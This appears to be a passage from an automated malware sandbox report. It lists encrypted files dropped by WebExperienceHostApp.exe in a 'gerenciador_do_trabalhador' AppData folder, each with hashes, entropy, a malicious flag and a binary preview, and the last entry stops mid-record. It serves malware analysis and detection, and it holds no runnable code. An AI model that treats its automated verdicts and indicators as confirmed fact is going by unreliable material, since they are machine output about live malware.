                                                                  Preview:>..=..F .X\wK<w.0.!S....Q..........G6...........r.=.j^,..M.....&..\3@.zrC.Q...5~....j..!.. ..uS.....~.c....P|..Z.b..P./....G..._.t.#8.4K.JQ.C.T...p..!D?...^..].....X[..f..sz..2.eP..:*r.NW...z.h.Oe..'D. O........H.D..$.e..$\.o.Z.%..+...IR....^v..P...PV...!3.[?9].o..v....p.].9...1.E.......i&.../..q..!..)6x!.....u)z5........O....Jp.gO..MI?.9.+.....MUaW5.t3.4..L......y...|....=GR)....W....#..}T..e..x-lx......Tb..&1mn..n............Sz.....*...q.R...0..y....E...A.d.......I......S.B.U...D...dX...dsu.7j.t...`..%`.O+z....C.f......WT..V.:..T%>G....[y..|...8...[....4....P......grv._].M..`..D.U......A..._...z.e'Ye.9.d.vwz.....h@.v.M+J.q(....G>|...?.Y...cFO.<.......2\.`.q4.D.".5.z/......wDS2U.......|..R(..b.=...X.=K&Y...my.z....}X'v..~E.t.8jN!.ZDe7..'qX....NU.8..r).G...(/..].X"M..6..\L++..m........[r..]7+1.e.....`*kh....08V....^k\..........8...k*.@zi|a...G.......).,G}...rk..?.Vp....+...Z4/YEF]..Q.1.{..}w.gOpU.;.8.t.R.AQ6..Y.}...K.%g.{......4
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):34458
                                                                  Entropy (8bit):7.994608566259596
                                                                  Encrypted:true
                                                                  SSDEEP:768:stH0VMSW6/XZqPtTg0NCEPpiiWtB0dkXir7Cr:WH06SDfcxgcCErWQ3K
                                                                  MD5:605B5BB77B2DF67A265DB36D7CCCB5AA
                                                                  SHA1:CA4CED1C839094E152B1D92DB49F68B5DBEB06FE
                                                                  SHA-256:885511827F06E769EBB3B5F94CA57EEB6AAEE2D220F2EF5EF704214439BDE4E5
                                                                  SHA-512:1CD218A976F8F9F9115829C6DB692525AA63C16887C0EE1B5A862AF53FD3B381F536E634D6156D740C23D9B3502752039D30A2148E6187311F9D08C442CE2D36
                                                                  Malicious:true
                                                                  Preview:.^.0...NB.."#..R3._@.9.Px*_.N?5...=.h...q...Y%hf...a.w.L....oxU..I...~S....".<P.g..^....F.0lK.....U......f.:.....B).TSK.^...u.SRM..f4D......".._.u.C....ui.ZN-......L..[Q.o_36%.V:..U..8....Z.q..Z.wS..I'..<..f.t...`.......Q.........."&.q.."5.'.Q..38.q...F( ..3..-.|&wz...P..%.....(....Hd...],...A.t..I)..K!7.E.r...i[.j.!A|.Vp.X_.F?k. <w.0......%..\}.-.u..W`.}..._(.D....Y......5b./ WS......u....j?X>..1....m{39...>...P3.d...0.;e:.A...y.M%k#mG3.OE.5J\7..^__.:&.6..~...@...~..f|....+-....6...]....U]'..N.Y..a.t.../q@..R.Vz.!.5(P...*.#.o.+i.n.3{.+. ..]!.}77.c."pz..T....A...>].2<&K......?.x&#..F.a&..D.}..K.E.y.@...8.3........nu.............R"x..KIK..h.t.........|..!..R.f.US(.]..h..d...8s.......;..5.7..d....x.z\..4L..,P.Q..-....g.;."..Y\.........:,.FS.b.a..<....f......d...}..H.$...>.N......3..T...........@.9.."...#(|.S..>."..}..eS........."....^Oy..\.5.1.:.y...jPK0.p.6.h.v..ksW.A.8.Og.K.:S&......}dBL..@.^..W.<.8..&..igC0..7'EN.LA....L.0< .v.J......o.cO!
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):96121
                                                                  Entropy (8bit):7.9979860190229894
                                                                  Encrypted:true
                                                                  SSDEEP:1536:RU+PC4brdG9pEmgUG5Al8jeEmMixaQ9y4VgpHie4rhWkMv+p0kj5BvlQAHHsJY1q:pKARmg95VeEmM9AgpH94oJvyvm2HsO1q
                                                                  MD5:8811940B4AE111BC3436759A042BBB2F
                                                                  SHA1:18382C1AC22D41C949E6365C5187BA9AE5646BAE
                                                                  SHA-256:FD7391BDA37AB38C9DD40FEC4108227D704EABC223612C2FAF15E54E4258DF62
                                                                  SHA-512:C95A961AB1CE706CB5E5670F953AACE419432A50D19822F0FCC5D76A729F9BEE652E26E82DFD4AB3ED2B49CDB099CAECEDFC92F7CBF9C6B82ED6C7D8E73C6F3D
                                                                  Malicious:true
                                                                  Preview:.G...lK".]+.j.-...i........e....Bu[.{...v$.........f.=...td].... ...Bi...U,......_.y1n3...t......(.....D;.z.&.P..!...6...,2V.v..0.F.R.+...--u,.{...oT........bk..sIRQ......*;...3.q...e..<...1W.........7....6;.3.3.,a?*SYz......'...a......@.[..n...M...O!,...H.4I.;..:...>..DRq. ...@8..i+........u.....b.T...9..Z...R.!....j.....$..5....y.[.....2h.v{=.d+.5.8.wk..62...[sI.H.f......+.......7..s.P.lg:......R....uJ#-.....D......l......~.3..p*J'S...v......i,a`e.T...<......C...R.....X.......G.....zY3.9d...g'!.E...I.KD6.9.."...~3|.UZ..%...V"...?.Q....v\.?1a.wEn.......K.E..F..S-.Q./....E.s...m.t.l...q].5.r...dw..dP...?<..zqs^..F,.*J.us&.......&._...xY|..X.bh.l.4_v..B.[@>..qa...1.E.p`..bSF}.20.j..C.x..31.8......&%...@wIK...R`:......V...^_..L<.-.9...`..a..dU..!.~....l..`..u}G)c>A.^.d.L.........%!%.<.....Ag%..3....&.....@.....!`.d{..'b..X.&..;S.. ..`.%^.BKX..6.....X+...BW......Q|<.y.c.E.L.1.%i^.).....n..z.n.....o....wo......D..1I..:..k..i.....'.U..H.d7..Z..K....B
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):35512
                                                                  Entropy (8bit):7.994321599527247
                                                                  Encrypted:true
                                                                  SSDEEP:768:oMd42bKNKN0IDSDcJs6kk6Lqdv3Du7PyjF7pRqa87Id2xs3Mk:oMd4VKQcJTkk6KrubyjFNoand2s3Mk
                                                                  MD5:0F582725109BFF986077F06A66BC3CFA
                                                                  SHA1:FD7C87BA4AF1E86A49517B0BEB7391F2431EDC30
                                                                  SHA-256:A992070D0852DFC3744F918A4BEE76059242E061CB64FD4E36D326A57721B9D1
                                                                  SHA-512:DCC551DF2EF59E9F1847ADDEF34F674881255EA2F7DF4A503620697FCB84AA1C9D76D9D39C3C8AC816613FB106A637A800C5E0B03274D85E5A8313506FBDBF19
                                                                  Malicious:true
                                                                  Preview:m.....5.S .![..=jI...<..Y....u..+...!...r@T..X.Bv...s.*..d.F..L?..@..$.*........Ky'f.....S.n{...'.]..h..ucD.sL...B..@$rQ..'+b>..VM.P+............k....\..C..O....\(0..+L..?.E..>.+y...*M..b]`8...-..pl....C..?...}G.nZ.....O(P.V#...<.[...p.R.>..OS.:.:|.:..w1.j..R....b.lE.4e!.H.oRfjY..!..8.F...3.b=!*x..}..0in..`.@....;..."b.1.......r...#.D.Z/......P.6.g.5..q.9..'+.N "..L.\~..{.N.Z.......qn..2hZU..C..<.PF..F?.'$s\.>.n.l..5..f.@.>...J0.....WA.nF.k...n.6......%....O.E.n..[?..T.....H.....Q..._@4..P.*..h...S!.=9Y..6....V7B.".,~j..I.....:B.8).I....&........NG.pP.K9...|l3.u...&.Uf\..7.7...v`..L_....rk$.l........]4...MrxT..).[|5.[.w... ...=o...D#.". .e6..x...0...N..*....E#....Q%.W(.6Z.P...(.X..ov...)%/........!`~.`...qh..)........s....A.-4....t0........j.k.`.X..a..+...z#..1/G.......B..y.g..l<..#.....s.>.\..|.'.{....H...k...y..6.2...t-_K.8:J....*...(...p.B..b.1...H[.....G..y..s.K.......N....b.R.hk%a.NA..(\f...AD\....f0u.g +..R3.}....iW..)#.P...b....'
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):98730
                                                                  Entropy (8bit):7.998158650143007
                                                                  Encrypted:true
                                                                  SSDEEP:3072:mkrRUrMcuPu8qpmngaG0sJTIEmNkvmyvrpYYdMZ:mkrGInipXaGnJcEmNk+yTpjd6
                                                                  MD5:A5920A16E3A4D8BD258F31BDF311A50C
                                                                  SHA1:BEBB2736063952DD2079D7E2E3AEB509EFE06717
                                                                  SHA-256:1FBAD5686B5F0B61C2B1C81C15F66822A8B2AB9ECC0D1A85D939D3BF52E49BE4
                                                                  SHA-512:543322373B74BAB8848C061C3ADD3BEF86EFBCF5E78A0279F2DABFD1DF5892ED33C1CCC42A2957F6CC910D50ED21D65B506E1D8D431EC19CCEE9E1FB5827467F
                                                                  Malicious:true
                                                                  Preview:*..b.......^.(...F.H~\......R........vu.,).>..7S... &.z.[..`i../... S.....~...K5...S...v.O..#,..2.Q.....)U..,!.U7...y..-...3..>.-KeG....tn"2.....D^C..;L.OJ..!......j...s.....H.g.yT...Z.p.D..SJ.....6.1[/._.+..GO..~..$..6N.....f...^...H....2..)m.0.'F...X.J...e..dt..].R......5..B[._.J9..X#\...h.GLP.9.d.^W..>4..M...0.P.13-..eW ...?.....6..+r......V..n5.>HN.U_2...M.D.w.y.B..n....I.B.D....7..~..0..+.M..-....Z..2..p...5>....M............T6;.......{...5....f.#1c."...%..y...J`....P=..^.D..Y.F.....&_....Y.(..*S..4...!.5..t.....R.oA4@k,.2..m.2..o:.#...R<....`y.%ag....0.9 5.......!%@5.]*..h..._....eAC..OGD...B-x...OdrA'.q.0=D.....G.B.~..PT..."j.......G..$d~.'...,..>....Ii*y.+0..l...:;*.;...Sl....h....U..B.%.......rr.Q[...kz..g.k.3%.6&t.n.c{.GY..../-..\.E.....T'.<..w...yz..;.0$..p....QJ..?K.]....Y............*1......J...b...\.....5:..U.v..E ..R..9Z...Z..~wK.1w.l..^ ..{.....cG5...uI)lG c..M..3..C*u..qd..B.n....xOk...&..Y.PPN09.t.<x..Uc...{...z......PNd&.oWjh9
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):52378
                                                                  Entropy (8bit):7.996225673406002
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Q1mh8GvTNy+JPVV2vHvKhOoy7o0YPwxH2EHv9:L8iy+p2fps9+H71
                                                                  MD5:1F9B104F05B24DF2BDD78E9AFB812697
                                                                  SHA1:CFCD528609AC1E21737FD95032676C3055F752EF
                                                                  SHA-256:525C53598F3ECC45724192BBD9FCCA0BE7404F561BB205B183E42F829C84F6E5
                                                                  SHA-512:9E0CAA49E9A4780B51DC12E08DAAD5A803FECA1D324F792E0754A5C26A5FD807E9BD6122D39D966214BD717CEBECA305DA20FC309EABFC22469073CD95D1B628
                                                                  Malicious:true
                                                                  Preview:c..4E.....uD..OD.l..w..:..........j.lD..z9.S...G...Cg%.../`...2Y#..N.|U.n......T.z.;mS...9.W....G......>j..`.)10 ..,G..{.se.......Q.:.>..o.E......SK/.......gC.N..]!.w.<w6..0F..2.&....oG..y...V..Gp.3...P....#..YS...v...{...v.>D..W..A.....:....nU.6..y........O...k.J.@..Z.........`..I$V.|.R....V.R......uN....=.._5A..tU).x..j.6r..x.e.$.j.?.......k.\...GC[....o...D..!.......e.=.....n.......E..SoB5...D2..1,..^7.....0...mHQ....hO...0tO.H...\.].t...:.=...Lo.;!..(...b..0;:@5.|.A8N._........F....W8.X.D9P.."3u\..$32KE.^@.W..Z./.}.f?.bc.c....6.l8..b[q..e.R..~../...W..{...p..F... .C.......'.$.........|..m.%.:...&.h...(G..>Y.........8..%.=...:jw...#........g.....u..Gn.*..".J.....Il.u..:...."..........S.x$.-...?.e.|.9......}.2.$q....9..p..g..(mb.:.E...\.Dr.x5...!3..8d..b....;-...7..f<..w~....S. .......7p.......l......-{D...S...|U..".xy...|..g&....crGu$h.@6L.L..k....G..}6............I.A.,9.}.....J7r......g..5H.......?Q..Q....../$..3.....Ib.0G.......>.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):35271
                                                                  Entropy (8bit):7.995110529395509
                                                                  Encrypted:true
                                                                  SSDEEP:768:f2R9YAR/wPTFXpB0stVwEltGTcRErDurukRdH+dsMBa21CmtBgBybv0:fEbkT5pBx4TcRCurmdmNmtB0yQ
                                                                  MD5:8079074AB97D798FFE52192503592B0B
                                                                  SHA1:30EFF32FAE6DD482B8D48CDB3FFCB2412545795F
                                                                  SHA-256:A35D45B62DDA3D4C9AD2F2EF2072F1B0D3F55D6394F72A8CAA359C05EF0D06DA
                                                                  SHA-512:94383F2F5115B7D017696848900EDCB77385FA46F419A8A8EFA73D9E29D9A44E6BEF0BB65ABAA861C80976489AB62D00C53ECF31B80F1080E2562B86CCF78597
                                                                  Malicious:true
                                                                  Preview:h.G.]7%.~..X.......Se......L...0.D...U..*.8...`..f..B-E...9m...bF.l..A....Z3..z.a.Z...\...yQ...~]#X.R.i....iT.....!.......(..2Ty.?'v...."\y..b.l"..&;zE../..g....y...#.#".8.N....x.S.=....H.n3?Jn....m...V..Ipy,..P.g...OO...7..@p.?..>...HCK6......(_.L\.Dyf.K....7.Q......j|.....[=&.3...N0...{21..T...y.....$Z.T.Q...#c8..g..v...Y...A.......O.Lm..K.....r.......g.-.{...4e.^]:."..{e.......e&.O.o.>.d..F.H..~E.L...%..D.I..T..55@B....^."s.|.^...;.,.:..}'v......<........X..p.mN..r.......}:..........s...nb@ ..i+8.a...[>..L..pq...jh....9.....1.46.8.(.!.....eOh$|'0....a...E..Ac....yQ..OK..9.m.6~....^.u.B...P.....`."y.X.m...?.....)C?,........%.U[...u./.^#...YD....t....&.G......Y.R!.&^q..M.@Z..!...u>b'.#.fW....U.4(.\)>......G.h.<.<..+.YVz./.~..t.A0.D..A3#j..}..<{(,FV..b[.;d3/eg.a.Ki..{...e........J.,..}...P..M.*..C..kX.j....|.>.....T4&"D..r.z.."..?,h.E>.?...F" .ofPz.V`Yer...~8..9.yF(.....%Q...G....mK\..j..V...?.Cs..U..N.L.*.e...UZ.L..y.5.z.E.>O8I.hK.R.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):68283
                                                                  Entropy (8bit):7.997488389296204
                                                                  Encrypted:true
                                                                  SSDEEP:1536:mfU349V6OAVolG0EQkDLby/Ey4XAfwNVr8qnvKQpkCh:R49V6ODlYNfTy4XLNVrlv/pkCh
                                                                  MD5:35177F73CFC118BF96AD2EBEADE20122
                                                                  SHA1:EF0CC47A5547F02098B15FEC671DC264127C6A0D
                                                                  SHA-256:EEEFBC5F582D597C827E72BF3290BBD581CCD55E8E0E21C8A2671C22CC74E22A
                                                                  SHA-512:1AA83A49F96A2DEC198034E92D4591078D17804F529346C1A0C9B5747A416CC555220038CB910325137458AE6670D8E945E6BA20F0A59D86DE66C3EBB481A476
                                                                  Malicious:true
                                                                  Preview:I.C+\..........9.(p0...b5(...|....O..)..?.4.........|mz.Ez.'.\G.F...z..aH2..\eZ&.D.....Sa+.I0.^.4....]`H=Qn9...D.O...Bb"....X..6.+jhUA..F...x...=..2..3"r......2..I.%..c.a [...u/s.S..].2.x...j.........#..y.A.k%.`..K:.....@..V.t..+...TM.'QVI..l.]...uk..i..@#_.:.}..,q-p.K..".*Kd...7k...Q5.D@.p.Z.F%.....%....=..SC...Do.be8P8.?..Gp..eK...gk.....O.b.<..,...\...Bj.....-...~..U....vTE..@].t..P.d.-$.{m...Td.k..$dc.....YC..:.'x..vRA.H..'....Va...4....?U..3/............E.V..+.~[<.@.........ct..K\...R.%@...YC.We4.4.AF....J.....).xa.W.q_...t*..(...4.U.Se.P.N.|..}..P..\....g.....DV.{....'.z...g. ....!........f)..td.F#....%./....KRt...9..#gJ......{...Cz..l...o......W.4.R.]........d<.....d........Y......N(.L ~H.+.:....g..vmF..M+g.F..*<...w..S#.]..x..&-..J..`.. ..H....k../..6.x.fI.kn...*...>.Y%)....y9....f.].0.`.A.J`.j..9q....g-....Y.T...<*.18.&.O4 0..U........:.....}..!.U......n...Z..+O. n..<.`.Z...&....U9{....#2."..X-L..P|./X..y.Y<.@....Z7...R...`....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):105124
                                                                  Entropy (8bit):7.998467327363212
                                                                  Encrypted:true
                                                                  SSDEEP:3072:NcDRBOWwGNketKJCxKUE/+SSkDuGwIgXdQSDpK:NcD/OW7NkU0UO+LouJhXd1g
                                                                  MD5:F431E45DBDBF13968726272A8EF4A5AB
                                                                  SHA1:1D2BD43B4DA393DA112AE1C58997316A49C7E910
                                                                  SHA-256:9E215300DCB001B6EEFC03A84225D482590BC3AC69F85D90EA8E3C9529018AE9
                                                                  SHA-512:1DD618A46CF77963DCFB80275F66B9E5D70FBA4F73543BAA3BA40085C5EC534DEEDF2EA757E793A7219C45EE572F9D3A574C54B381925A986BCD6EA9E0ABFC55
                                                                  Malicious:true
                                                                  Preview:....i.K.n4..?s>.!........E....H....a.A.+..*..>.... ....._l..fv..Y...:3...q...2.y.i......-....Y'v.<M.~n.(......5...[....*D..ao.....8.....7..................N....."....V.M..c....A.%.^-.3.X.H.8...r.T.].3..wxV.........V(../x.2N]...l.<..<.0N6b4..qx.......s.IV."....Xtxz.w..@=PaW*<[.Q@.e.R;.S.Mg>...8?....."..3..wL......W....jq.E..5xti....z.(.l.Y.-#.e...[......+.e+..w..k..".[".x.v.^.^!HrV.S.z_.t.+.<.....t@:.]..f...H.2...\Z...pz.....,-^..3s...[d...6.9.Ux...*.iH.wk..{....NJ..fWK..K.......|.t..-Y.....t.T.4.Q....`.R...MScl......O.K6zD/..uge.@8.zs...C.C.6.....S.W.{.....:..!@.^8g.1.l..,\Q.. ........E...~...1...=@M=...g...+a.P.....\3.j....l....mY.U..Dh.u...P...5...$...p//o.."...g.|.9..q..*..^... .#8.8.YAR}..t.?..L...Jn......#K.w.+.C.|.... X.N4..[.q...%.t.Zt..9w../.H.).:..P..:.n....a{...t.V$W..m.7..~.=..2.k.....U.~......S..S..po..EyCc.VZ.m..m.t[_..Y e......;o.on.}...x..S..q^D............d....cr..~.g..f....3...k.W.;..s.:....*~b..{h..!.!."R.....2....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):56374
                                                                  Entropy (8bit):7.997015079015027
                                                                  Encrypted:true
                                                                  SSDEEP:1536:ZUaJoie7dKT1Sid+sS9Itt8wFrFbTJuSpoB+:OH8T15dvS+j8uRzoB+
                                                                  MD5:1CE724F1D2F8C62763775BAE2A19FA6C
                                                                  SHA1:929DBF551587D5786E9287848126229B2E498DE1
                                                                  SHA-256:C69D3D0D15A2414BC71CC45E1ED47D3821D505B6CD089A6DCA5B2CC8F4869081
                                                                  SHA-512:3867B205E6034210124B4D0F16448490E7DA6B634ABD4F4AF8B98A879A34E04E18985F97C583556EC21313B000C11C47204546DAA834CC0CCA3B426507D45155
                                                                  Malicious:true
                                                                  Preview:.;.........z..m.x.U}......tfj^..K.........CD....5Gk..D.:......w.g.*....O.....z...;.......3...T..g.t...i...l".....i.t.v.W^.&.=..iw...j-IA*.....F...//......|............Jg.....b..vn}..?c.j.....v2... .PP2.gcVcU..Y.)........... ..w..)..).....y.,H......d#....>.dJ>.c. .]"<.h.|..iUn.r`.M......d.....`y.s.1...'.)..L....:....xb..R+*..w.q.p.-.^.</...{V2h5I5.g..kT.R.m...-B...m;..U..W_.....v.....KZT..qh..c.Z.X.n?.B.....`g.....I..w...HV.....*J..HB....?..A8m..r..k.z.D.Ba..;....A.kR,.=...... ...vJv..(..j......w.....9.]|;qT..L. .............k.{u....Y.7..5.....M.b...IG#.v3R...%....;.B....|Y..=...K.z.$7^-.+...."..,..EW......fC,Qr.C...`.K...:sr.....D...m..V.0)E.......@.m..F...\..a.....%....6..h..q.X...+=.|{........Y.0...y^....m..f..^..T%.l>....?.c...")...W....5...I...d...,..4....(...2J....|t|.. .fj.Q....zd..%.)-.TI.uz;.........I.p.i.........^;.C.>j..J#...w.6.|.u_....bg..)X..lkrT.l.t..4....~..BE?.:.ka.,M._..#..!.0..~...4r;?mu...b..~o ...Z..w|...6..`S}ly.K.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):89443
                                                                  Entropy (8bit):7.9979139839442555
                                                                  Encrypted:true
                                                                  SSDEEP:1536:uH7NXfr6rZZ1pNQjHMh/JoccM/Gzwecdqu8VDEV0B3WuG6/hOd4Ij9iqwvBLmRRn:O7NP+Z1fQbMNJhf/G8eAqFGCB3P8b9ig
                                                                  MD5:640CF1CA12E3FDF0E19ACB8ADACEEE55
                                                                  SHA1:11F36F8EA97B7E0036C5C571490F58AFD6024C47
                                                                  SHA-256:45B5FDB6E0234FA884594441ECC9A5B7091DEA0D77021938F16F9FC7B93D34F6
                                                                  SHA-512:9DA4B5BE8D303491176CA5AC12F8FCF71A5AAA10ECFE8997E857D18EA8876E10110000A412C187655756F73FD544051C32A3AB120F663E001941241BB8D636BF
                                                                  Malicious:true
                                                                  Preview:%.Sf...1t.:.?...........6.r'.. ._...x.3.M.C...b..c-...9Y...{}rz...W...sQ.ol....(.V..x...{LH(......)f..a..e.&}.u?.@.....".;.d.....in. .]N.....g.3.,..6..Gt....i8......l{......@..J..f.....c...o*.F...a..,...5w......g.-&...@.]...O...4#.T.E.f.N........}/.......Iyio.LR..C->Bh.j.H).r.T...@S..$....~......l....<....{LX.....9.D.._K.B[.....n...$V...CH.6....$.Z..~1.e.of.N...TY..E.V...E.]..D.z.U..=.}:.|.$...]]g^P..t.....jX......5..Q*.C..E.=....\..i%.'{u.&b.E...^...&^u).}..o.W... .{S.5..'A@D.|.k.?..N{.R...Y).&......9..].....*V...?.B..s.^T....D.[.)..w.\....Us/j..#......1...P.X.<9r....!p...R.\......84*..]..)w{.l......V.;....l).&.~..=y....h$..d.w.....v.E.%{....%.*...uEy.. 8R......9....3.,b.....R...eq.......p.u.AN7...2-.2h..F...P.N0^.FB.&I~..a...,..(.N8.k..L9|x.H...P.......CPV...../.X-o.a|..,e..^..#q.fjI7.J?e..u,...N......K.195....>.'*.eg.#..6b.....;2T.'...i....X6.=..9.>.=....:^..#{.w.X./|..R..j.|3..Nl..n..N....,-..tTx.q.....r: @{S....Bb..'X..J..,...PVy.k;.K
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):37237
                                                                  Entropy (8bit):7.9946004510102116
                                                                  Encrypted:true
                                                                  SSDEEP:768:Lrt9dwBFEdL8GtVM5TJQdpuHA7gm3SYb//iT:d9SLYL8GbQFQB7gmCYb//iT
                                                                  MD5:33C92B526406EFA85AB5B7EFE3C8F774
                                                                  SHA1:4E4C789EF38126110F9B4EA8C655DAC2DAE4DAB5
                                                                  SHA-256:6140165A94FAD47C72CDC6DF946C6CF49895E2B03EEE7C356F5AE5A9B913964A
                                                                  SHA-512:209281CDD0A5C2B3E34F3B20FAC63D1ACB1563D36B857551652269B8A033DE9036D7F245E65424960C2C0DEA45644AAE8B7B26FB59F98608277B9570844C2EDD
                                                                  Malicious:true
                                                                  Preview:.[..]....P;....g'../..>.@=..q_....X..............l.....K..y...K....8J.6.z.=.*-......k......M1.....s.iN.j....fC{...._=....:WJD....`lV.%.EAN....)PC.......x.m.z`+...<..^d..>.0......7.R^.4...o}...m.. .....^..h..b6.W...A]]..d.L.......Q...k.a.;I.~.,)..@._dAc......;.fU..'...>.........p..?...*.%.O.[..W.j...&...6W.n.=-T._....c...Le...N=....D..8T;.B.]..5.5q..k.u.........TO..[...8..q...N....>....."..!.A.t..=..d.`.9...(...9.h.._.zs.7..\.P..oh@..X..63..L...h...D..BLu.MT.j..`$.^....l..t$V..Q..f.....s.lY..u_..{.ns..F..n|.c.....O'...fBC.(.e|.....d.e.......A..f.L..:.].ku.:@i.~.....k5."-W..B.w.......C..W..s.. ..:.r.*\..<#<...K0.Ev.E\.. ..nL..!.q.fO.:N.N...d.A.g......... #Z.1.Cw...r..as..k..#..............B2....I............i.....5..P|:.cK..3...4d...V..w.fO.M.l.1.QeBL|..J..e.).k.Wi.e.$.O....%.5j..L..+.A.6N.-.:.*..s.r..U%I.^.....f.^..*.^..zA....r..HB..........B..X.$...b5z.,q......!E.....@......kR.4A..It}...nQ...s.....?..H.f...O.....HJG/...p.;..V........BT..Vi.5..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):100030
                                                                  Entropy (8bit):7.998056554555185
                                                                  Encrypted:true
                                                                  SSDEEP:1536:d2zlCeo1t6OmuqE/B1ZpTmCa4S8clhppQHBXBewFUpuDHehCPPdD99FT1ucX:gfAqEp5rclhpGRXF2uDMC3dBj1ucX
                                                                  MD5:729D88487AAC4AF729C540798A12AEF1
                                                                  SHA1:7FA1514910376234D7D08162632056BEDDADF545
                                                                  SHA-256:39FD0A911F378B31EE05EA0D17C54A6377CFE8913AD8345A981A135C9E275526
                                                                  SHA-512:7CADA77A38A036E93455166C929CD6EE5CC7FA953D56B472F4ADD62192127E9C27A59408D12705AE97A395D69C8EEA3EE98D0C509D842CE59C538C0DEAB86EE0
                                                                  Malicious:true
                                                                  Preview:.5.R...8/...eq.fk...,|.\.2.}...<H..6.o..!.b..pe..}.X.:B-....)...YD;.Z;.b......Q"...7.?.........R..1Wt.._.3......g.$O..!......S.)||.86....[/.n...^...|$...Yx..Z.../......yyU.x....A._...%.....p.8.o$..Yz..y.....7..C.....y..F./..XK....v.. _O,.wQ...\>94${........T!b.t.+;rK.....+.d.@_K..._.5#...9*..,=.M..Jn..#....sf.....V:.... .PPGJba......*...q......c/..3..cV....~x...X.XQ<H..0 ..k....G..q..g.qX..f..Z..>.3.5(/.I.oq.\..\1.a5........#.........T..m ..X.xZ..RA..x;D.B.8..v5G.R"...L..C6...9..92lw'.3..Y.-Jh.f*Y..A...Q..A*.....@.;^....Vp.b..@.P...5.....f.B1.`r=w..p..e...X...Qx....D&.~..e.....a.z.D..\......X>....$.o..;..:...4...... ......L......t...w.rg..s@......=...N......&.S*.Us.......j"..)P+..F........)6...D.H.C..pL.......(.P.XX.[..=X.F.v<.uG.._p../..E`q.S..O.,..`Y.#.Q....A..&...f....G...s].....0..V7.X.Jt............l..z.....VBFi......|.....TI.t.........&.7s..N.4.E.!.&..-...`qtB..m...j.*O...C..T.{eKJVV...Z.D.rvi..7..b....7.y..V..a~....W.p{.Y..rS.n.8..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):31722
                                                                  Entropy (8bit):7.995285181282859
                                                                  Encrypted:true
                                                                  SSDEEP:768:g+MVmtBfa1xKkbCy1AkKwaTZ2uWQNaCsW:g+tMxR3UZyQsCsW
                                                                  MD5:4CE2489178807770BCC16A577DAB619D
                                                                  SHA1:8F4A35028E813C81AEEA69A5B1C869F8A0DA80D1
                                                                  SHA-256:0517C5B0583A8CE9E06C8CC49E52C5B5407C555CA592F9B4E8229C0179878503
                                                                  SHA-512:5CE1C70C93C94F530483753261D1E037C15DE1D366D3A15C442EA2AF29736614B47D93BD7CD112F7BF103783630775B52F27D063DCF88B17C11E32058807F2B9
                                                                  Malicious:true
                                                                  Preview:B..;...(.......L.k.Z8.6:.B8RT?.".B.K..w"#T.`....$.p.T)TG..SjmYUi&>=G.W.R.....hO;\.~....%..V;....cS4TW..3.w}%#.(.E(b........!...Q.......lh3.B@.....4T8.....!Y..Q.T.%<......._.I.).MX'!..g..{"#z..<06..XU..i".9.q..4...o.y..+..."..!R.L..j-.. 5.LL..."..~......'..!..:]`s....zY0.y.<.(..V..E.Y..z.#$....<...pU.A~E..C.\.....w.Nr......v...j..<..n..]..2....xc.1.).U...J............;-.S..Q5Q..Z,b.%ur.Sn>.m.._..n@K+.r.O.C...M}j.!....j.........Q|NBb@Rod...(..v..I...lK..........-...r..~....v?M...D.9...e.'.#2g%.9Zi[..tZ.(G..6O...g.....q}.h...0.9Y|..{pD.o.q.L?A...........f...2%.\<h>....j.........Q..S.../>OB..C....h..xj...1!V.8deQ.O.M...*...#.|L+b.q..@/.._B....L..\.....u.........`&F#.....5..........*..8........Z.Aw$..n.....OF.........t:.....*.i..\W.{.a..F.....g9.....4.O.%.of2.<Qe.R..O...dl......K..@.U..,]....l.f.$k.[.s.....5....?w......!mI.8..t.s...Ln<w....N....!.Sd<.}a..^(.\W...M5k....F........._A.&>.Z7..n.t..r..9.{....`....C/.M.4c...~.<...n.[P...9...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:OpenPGP Public Key
                                                                  Category:dropped
                                                                  Size (bytes):64813
                                                                  Entropy (8bit):7.997522140248982
                                                                  Encrypted:true
                                                                  SSDEEP:1536:jb/OJcIi28LcnHxWJxV/NekLSQQTxLXkSzPzY25txEe:POJPVsmxWrlpGx7bzjf
                                                                  MD5:7AA41FEF72388B147865D0A084E1A20C
                                                                  SHA1:B641E661E298C5B16786EE5F305A5BD25B17B8A1
